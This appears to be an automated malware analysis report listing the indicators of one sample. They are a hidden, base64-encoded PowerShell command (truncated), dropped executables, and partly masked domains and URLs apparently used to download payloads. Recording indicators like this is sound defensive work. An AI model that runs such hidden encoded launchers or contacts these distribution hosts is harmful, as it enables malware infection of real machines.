Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABOAHYAYgBuAHUAdwB2AG4AZABtAHEAPQAnAFIAeABjAGsAdABwAGwAbQB4AHEAJwA7ACQAWgB4AHQAaQBlAG0AdgBrAGwAbABiACAAPQAgACcANwAzADcAJwA7ACQARgB0AGQAagBqAG0AYQBpAD0AJwBZAG4...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1456
- %TEMP%\1218960.cvr
- %HOMEPATH%\737.exe
- %HOMEPATH%\737.exe
- 'cu###ndroid.com':443
- 'so#####ysavvyseo.com':80
- 'ol#.#igbom.com':80
- 'ol#.#igbom.com':443
- http://so#####ysavvyseo.com/PinnacleDynamicServices/l0305/
- http://so#####ysavvyseo.com/cgi-sys/suspendedpage.cgi
- http://ol#.#igbom.com/wp-snapshots/installer/3vouc050850/
- 'cu###ndroid.com':443
- 'ol#.#igbom.com':443
- DNS ASK cu###ndroid.com
- DNS ASK so#####ysavvyseo.com
- DNS ASK ol#.#igbom.com
- DNS ASK te###653.club
- DNS ASK ar##lan.biz